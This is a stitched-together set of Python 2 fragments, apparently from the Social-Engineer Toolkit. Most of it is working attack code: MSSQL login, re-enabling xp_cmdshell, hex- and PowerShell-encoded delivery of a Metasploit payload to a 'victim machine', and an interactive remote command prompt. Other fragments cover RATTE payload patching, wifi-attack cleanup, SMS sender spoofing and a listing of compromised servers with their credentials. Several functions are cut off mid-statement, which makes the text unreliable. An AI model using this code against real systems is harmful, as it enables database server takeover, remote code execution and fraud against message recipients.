def deploy_hex2binary(ipaddr, port, username, password, option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username,
password)
setcore.PrintStatus("Connection established with SQL Server...")
setcore.PrintStatus("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen(
"cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null",
shell=True).wait()
subprocess.Popen(
"cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null",
shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.PrintStatus("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode(
"$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)"
% (random_exe, random_exe))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.PrintStatus(
"Attempting to re-enable the xp_cmdshell stored procedure if disabled.."
)
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query(
"EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
)
# need to do it a second time for some reason on 2005
target_server.execute_query("RECONFIGURE;")
except:
pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.PrintStatus("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.PrintStatus("Deploying stager payload (hex): " +
setcore.bcolors.BOLD + str(print_line) +
setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" %
(line, random_file))
setcore.PrintStatus("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.PrintStatus("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.PrintStatus(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.PrintStatus("Deploying payload to victim machine (hex): " +
setcore.bcolors.BOLD + str(data) +
setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" %
(data, random_exe))
setcore.PrintStatus(
"Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" %
(random_file))
target_server.execute_query("xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
setcore.PrintStatus("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.PrintStatus("Spawning seperate child process for listener...")
try:
shutil.copyfile("src/program_junk/web_clone/x", definepath)
except:
pass
# start a threaded webserver in the background
#import src.html.fasttrack_http_server
subprocess.Popen("python src/html/fasttrack_http_server.py",
shell=True)
#child1 = pexpect.spawn("python src/html/fasttrack_http_server.py")
# grab the port options
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath),
"r")
port = fileopen.read().rstrip()
# if for some reason the port didnt get created we default to 443
if not os.path.isfile("%s/src/program_junk/port.options" %
(definepath)):
port = "443" # default 443
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
#child2 = pexpect.spawn("python src/payloads/set_payloads/listener.py %s" % (port))
# now back
os.chdir("src/program_junk/web_clone/")
setcore.PrintStatus("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command, ))
#time.sleep(5)
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command, ))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
fileopen = file("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe", "wb")
host = int(len(ipaddr) + 1) * "X"
rPort = int(len(str(port)) + 1) * "Y"
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
filewrite.close()
fileopen = open("src/program_junk/msf.exe", "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe", "wb")
filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
filewrite.close()
setcore.PrintStatus("Done, moving the payload into the action.")
if upx_encode == "ON" or upx_encode == "on":
# core upx
pass #setcore.upx("src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe",
"src/program_junk/web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile("%s/src/program_junk/web_clone/x" % (definepath)):
os.remove("%s/src/program_junk/web_clone/x" % (definepath))
shutil.copyfile(
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.PrintStatus("Connection established with SQL Server...")
setcore.PrintStatus("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query(
"EXEC sp_configure 'show advanced options', 1;GO;RECONFIGURE;GO;EXEC sp_configure 'xp_cmdshell', 1;GO;RECONFIGURE;GO;"
)
mssql.execute_query("RECONFIGURE;")
except Exception, e:
pass
setcore.PrintStatus(
"Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
except: import autorun
if infectious_menu_choice == "2":
sys.path.append("src/core/payloadgen/")
try: reload(solo)
except: import solo
# Main Menu choice 4: Create a Payload and Listener
if main_menu_choice == '4':
filewrite = file("src/program_junk/payloadgen", "w")
filewrite.write("payloadgen=solo")
filewrite.close()
sys.path.append("src/core/payloadgen/")
try: reload(create_payloads)
except: import create_payloads
setcore.PrintStatus("Your payload is now in the root directory of SET as msf.exe")
if os.path.isfile("src/program_junk/meterpreter.alpha"):
print "[*] Saving alphanumeric shellcode in root directory of SET as meterpreter.alpha"
subprocess.Popen("cp src/program_junk/meterpreter.alpha ./", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen("cp src/html/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait()
# if we didn't select the SET interactive shell or RATTE
if not os.path.isfile("src/program_junk/set.payload"):
setcore.upx("msf.exe")
# if the set payload is there
if os.path.isfile("src/program_junk/set.payload"):
subprocess.Popen("cp src/program_junk/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait()
try: reload(solo)
except: import solo
#!/usr/bin/env python
import subprocess
from src.core import setcore
#
# Simple python script to kill things created by the SET wifi attack vector
#
interface = raw_input(
setcore.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
setcore.PrintStatus(
"Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this."
)
subprocess.Popen(
"rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up"
% (interface),
shell=True).wait()
setcore.PrintStatus("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
setcore.PrintStatus("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()
setcore.PrintStatus("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
def launch():
while 1:
print("""
1. Pre-Defined Template
2. One-Time Use SMS
99. Cancel and return to SMS Spoofing Menu
""")
template_choice = raw_input(
core.setprompt(
["7"], "Use a predefined template or craft a one time SMS?"))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/sms/'
filewrite = file("src/program_junk/sms.templates", "w")
counter = 0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile = infile.split("/")
# grab just the filename
infile = infile[3]
counter = counter + 1
# put it in a format we can use later in a file
filewrite.write(infile + " " + str(counter) + "\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread = file("src/program_junk/sms.templates", "r").readlines()
print "Below is a list of available templates:\n"
for line in fileread:
line = line.rstrip()
line = line.split(" ")
filename = line[0]
# read in file
fileread2 = file("src/templates/sms/%s" % (filename),
"r").readlines()
for line2 in fileread2:
match = re.search("SUBJECT=", line2)
if match:
line2 = line2.rstrip()
line2 = line2.split("=")
line2 = line2[1]
# strip double quotes
line2 = line2.replace('"', "")
# display results back
print line[1] + ": " + line2
# allow user to select template
choice = raw_input(core.setprompt(["7"], "Select template"))
for line in fileread:
# split based off of space
line = line.split(" ")
# search for the choice
match = re.search(str(choice), line[1])
if match:
extract = line[0]
fileopen = file("src/templates/sms/" + str(extract),
"r").readlines()
for line2 in fileopen:
match2 = re.search("ORIGIN=", line2)
if match2:
origin = line2.replace('"', "")
origin = origin.split("=")
origin = origin[1]
match3 = re.search("SUBJECT=", line2)
if match3:
subject = line2.replace('"', "")
subject = subject.split("=")
subject = subject[1]
match4 = re.search("BODY=", line2)
if match4:
body = line2.replace('"', "")
body = body.replace(r'\n', " \n ")
body = body.split("=")
body = body[1]
break
if template_choice == '2':
try:
origin = raw_input(core.setprompt(["7"],
"Source number phone"))
body = raw_input(
core.setprompt([
"7"
], "Body of the message, hit return for a new line. Control+c when finished"
))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body += ("\n")
body += raw_input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
pass
break
if template_choice == '99':
break
if template_choice != '3':
while 1:
print("""
Service Selection
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
""")
service_option = raw_input(core.setprompt(["7"], ""))
# exit
if service_option == '1':
break
if service_option == '2':
break
if service_option == '3':
break
if service_option == '4':
break
if service_option == '99':
break
if template_choice != '3' and service_option != '99':
#sohoOS service
if service_option == '1':
for to in phones:
send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.PrintStatus("SET has completed!")
core.ReturnContinue()
#Lleida.net service
if service_option == '2':
user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
password = raw_input(
core.setprompt(["7"], "Your Lleida.net password"))
email = raw_input(
core.setprompt(["7"], "Email for the receipt (optional)"))
for to in phones:
send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(),
user, password, email)
# Finish here then return to main menu
core.PrintStatus("SET has completed!")
core.ReturnContinue()
#SMSGANG service
if service_option == '3':
pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
for to in phones:
send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(),
pincode)
# Finish here then return to main menu
core.PrintStatus("SET has completed!")
core.ReturnContinue()
#Andriod Emulator service
if service_option == '4':
for to in phones:
send_android_emu_sms(origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.PrintStatus("SET has completed!")
core.ReturnContinue()
if counter == 0:
setcore.PrintWarning(
"Sorry. Unable to locate or fully compromise a MSSQL Server."
)
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
setcore.PrintStatus(
"Select the compromise SQL server you want to interact with:\n"
)
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
success = setcore.bcolors.BOLD + success[
0] + setcore.bcolors.ENDC + " username: "******"%s" % (
success[1]
) + setcore.bcolors.ENDC + " | password: "******"%s" % (
success[3]) + setcore.bcolors.ENDC
print " " + str(counter) + ". " + success
# increment counter
counter = counter + 1
print "\n 99. Return back to the main menu.\n"